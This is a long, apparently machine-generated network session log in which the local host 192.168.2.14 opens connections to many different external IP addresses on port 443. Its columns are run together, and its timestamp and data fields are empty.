                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17414192.168.2.1439944203.193.78.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17415192.168.2.1455342139.223.110.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17416192.168.2.143506693.18.105.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17417192.168.2.1444288115.248.17.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17418192.168.2.1450638209.252.10.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17419192.168.2.144215251.22.28.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17420192.168.2.1444604213.37.113.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17421192.168.2.144596451.185.236.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17422192.168.2.1459532118.74.122.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17423192.168.2.1444344128.228.159.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17424192.168.2.145068262.252.123.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17425192.168.2.1441866117.125.220.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17426192.168.2.144972877.193.17.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17427192.168.2.1451330160.131.168.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17428192.168.2.1448666158.197.57.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17429192.168.2.1437696176.118.26.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17430192.168.2.14591945.119.71.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17431192.168.2.144995676.191.176.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17432192.168.2.14428448.121.174.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17433192.168.2.1456178146.197.40.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17434192.168.2.145869079.197.179.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17435192.168.2.1438006179.138.141.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17436192.168.2.1452122101.204.195.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17437192.168.2.1450976131.112.252.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17438192.168.2.14445028.221.239.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17439192.168.2.145028266.234.93.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17440192.168.2.146056254.85.173.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17441192.168.2.145415071.191.31.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17442192.168.2.145725053.17.193.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17443192.168.2.1444330209.216.173.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17444192.168.2.1454328178.86.225.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17445192.168.2.1455506124.22.180.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17446192.168.2.1446356129.17.91.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17447192.168.2.1435754173.221.6.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17448192.168.2.144184688.170.32.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17449192.168.2.1454518128.111.127.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17450192.168.2.1455370131.121.62.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17451192.168.2.143378871.1.194.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17452192.168.2.145456435.38.142.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17453192.168.2.1458754121.33.244.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17454192.168.2.1455166123.143.249.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17455192.168.2.14456782.21.61.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17456192.168.2.1438738111.245.194.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17457192.168.2.145779293.147.9.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17458192.168.2.1439990210.30.199.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17459192.168.2.145750412.41.210.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17460192.168.2.1460326148.156.53.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17461192.168.2.145170459.34.87.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17462192.168.2.143280617.131.179.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17463192.168.2.1442402150.118.131.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17464192.168.2.1459494186.43.137.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17465192.168.2.1444950129.135.119.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17466192.168.2.145246014.121.126.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17467192.168.2.1446952103.85.51.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17468192.168.2.144838479.61.89.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17469192.168.2.1435970195.118.29.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17470192.168.2.1446132151.166.8.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17471192.168.2.145578437.56.5.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17472192.168.2.1440212177.87.152.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17473192.168.2.144471439.166.118.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17474192.168.2.1457776101.73.60.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17475192.168.2.1438496193.17.25.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17476192.168.2.1438396134.99.192.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17477192.168.2.1457142200.99.176.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17478192.168.2.1450354222.37.201.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17479192.168.2.144110249.116.118.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17480192.168.2.1444774181.138.100.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17481192.168.2.145125441.39.78.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17482192.168.2.1440200123.252.154.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17483192.168.2.1447134113.60.217.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17484192.168.2.1442908157.162.191.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17485192.168.2.144790857.97.115.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17486192.168.2.1437222119.206.14.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17487192.168.2.1459734147.230.161.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17488192.168.2.145757050.62.185.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17489192.168.2.144228262.141.132.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17490192.168.2.144663269.37.21.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17491192.168.2.1443944144.2.215.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17492192.168.2.146034466.16.24.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17493192.168.2.1437254121.91.73.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17494192.168.2.1443828166.209.41.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17495192.168.2.1433074210.146.40.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17496192.168.2.1445980218.53.217.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17497192.168.2.1459808115.43.142.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17498192.168.2.1457788206.146.213.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17499192.168.2.1434124126.87.79.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17500192.168.2.1449566183.28.5.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17501192.168.2.1448788157.231.225.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17502192.168.2.1433364186.45.77.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17503192.168.2.1436502205.161.87.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17504192.168.2.1436692133.227.174.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17505192.168.2.1452018179.15.45.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17506192.168.2.1434864121.44.115.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17507192.168.2.1446872135.240.76.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17508192.168.2.1456582131.224.137.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17509192.168.2.1443258220.27.36.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17510192.168.2.143371818.158.56.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17511192.168.2.1433724162.83.191.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17512192.168.2.144657072.52.168.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17513192.168.2.1433710212.198.202.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17514192.168.2.1440406118.42.186.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17515192.168.2.1450908143.60.12.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17516192.168.2.1451620126.70.78.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17517192.168.2.145968261.201.216.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17518192.168.2.145176434.234.20.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17519192.168.2.1454938129.206.81.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17520192.168.2.145289872.170.142.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17521192.168.2.1451840122.104.119.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17522192.168.2.145653054.29.97.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17523192.168.2.145247639.237.142.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17524192.168.2.145276437.225.207.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17525192.168.2.1457492162.172.2.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17526192.168.2.1439214103.150.138.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17527192.168.2.1437218202.111.41.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17528192.168.2.143670291.235.64.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17529192.168.2.1453708182.180.253.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17530192.168.2.1452528141.28.110.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17531192.168.2.144083287.135.84.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17532192.168.2.1460878163.168.64.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17533192.168.2.1436010144.63.128.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17534192.168.2.144929017.81.178.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17535192.168.2.144892660.65.76.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17536192.168.2.1450346219.11.227.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17537192.168.2.144220070.182.223.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17538192.168.2.1437834113.236.217.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17539192.168.2.1451228201.169.1.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17540192.168.2.145577248.176.124.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17541192.168.2.145326860.67.126.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17542192.168.2.1436214179.177.147.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17543192.168.2.1449126128.52.87.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17544192.168.2.1457140193.0.97.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17545192.168.2.1449716133.248.236.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17546192.168.2.144510412.62.36.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17547192.168.2.143924031.161.132.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17548192.168.2.1454642117.122.244.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17549192.168.2.1453890115.174.251.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17550192.168.2.144811250.182.240.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17551192.168.2.143288487.133.133.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17552192.168.2.143611641.201.189.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17553192.168.2.1444446107.160.82.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17554192.168.2.1436458206.4.196.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17555192.168.2.1454102184.84.212.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17556192.168.2.145416044.15.171.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17557192.168.2.1446374115.145.141.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17558192.168.2.144793670.252.229.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17559192.168.2.1458712110.123.239.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17560192.168.2.145180281.255.95.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17561192.168.2.1447578167.182.126.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17562192.168.2.1450744119.185.57.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17563192.168.2.1443234124.10.45.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17564192.168.2.1434492212.4.25.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17565192.168.2.1433192153.107.125.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17566192.168.2.144687813.175.111.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17567192.168.2.1433138194.113.6.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17568192.168.2.1458898182.67.6.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17569192.168.2.145807080.114.197.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17570192.168.2.144961414.37.60.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17571192.168.2.1440338167.179.130.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17572192.168.2.1434852148.221.144.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17573192.168.2.1448272163.235.225.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17574192.168.2.145204442.223.210.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17575192.168.2.14568628.11.162.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17576192.168.2.143364289.62.177.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17577192.168.2.1434398206.130.62.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17578192.168.2.146007012.141.217.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17579192.168.2.145871641.212.91.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17580192.168.2.143801849.118.168.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17581192.168.2.144820437.53.120.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17582192.168.2.143956438.103.123.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17583192.168.2.143466499.73.226.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17584192.168.2.1450154128.43.25.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17585192.168.2.1439068111.110.117.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17586192.168.2.145438441.130.59.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17587192.168.2.145825447.188.36.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17588192.168.2.1460370158.239.225.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17589192.168.2.14573801.34.66.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17590192.168.2.1458316173.148.228.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17591192.168.2.143294463.209.103.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17592192.168.2.1441390183.209.20.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17593192.168.2.1447150177.186.97.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17594192.168.2.1439060200.183.106.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17595192.168.2.144966272.80.211.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17596192.168.2.1445900154.115.119.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17597192.168.2.143660284.62.235.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17598192.168.2.14446488.46.115.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17599192.168.2.145382689.47.84.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17600192.168.2.1440224180.9.83.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17601192.168.2.145136853.105.71.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17602192.168.2.144200695.153.61.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17603192.168.2.1450370166.131.103.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17604192.168.2.144528261.41.8.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17605192.168.2.1452652141.1.32.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17606192.168.2.1443920188.115.87.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17607192.168.2.1439400122.177.162.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17608192.168.2.1454722211.86.192.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17609192.168.2.1448708157.139.223.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17610192.168.2.143338659.100.33.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17611192.168.2.146076440.209.111.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17612192.168.2.1434680221.185.198.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17613192.168.2.145225665.60.198.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17614192.168.2.1452196171.51.164.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17615192.168.2.144104644.208.99.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17616192.168.2.145969891.133.68.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17617192.168.2.144905631.146.74.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17618192.168.2.145920687.141.251.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17619192.168.2.145562062.221.118.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17620192.168.2.1454202185.148.3.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17621192.168.2.145145274.171.52.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17622192.168.2.1457172207.163.222.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17623192.168.2.145793085.6.17.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17624192.168.2.1444308169.7.58.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17625192.168.2.1454878186.31.182.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17626192.168.2.14438269.55.116.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17627192.168.2.1453068169.188.49.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17628192.168.2.143838081.160.178.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17629192.168.2.14472509.201.162.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17630192.168.2.1450616107.41.27.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17631192.168.2.143703685.209.82.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17632192.168.2.1457042141.99.12.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17633192.168.2.1459134200.28.200.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17634192.168.2.144463065.173.39.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17635192.168.2.1450310108.233.101.53443
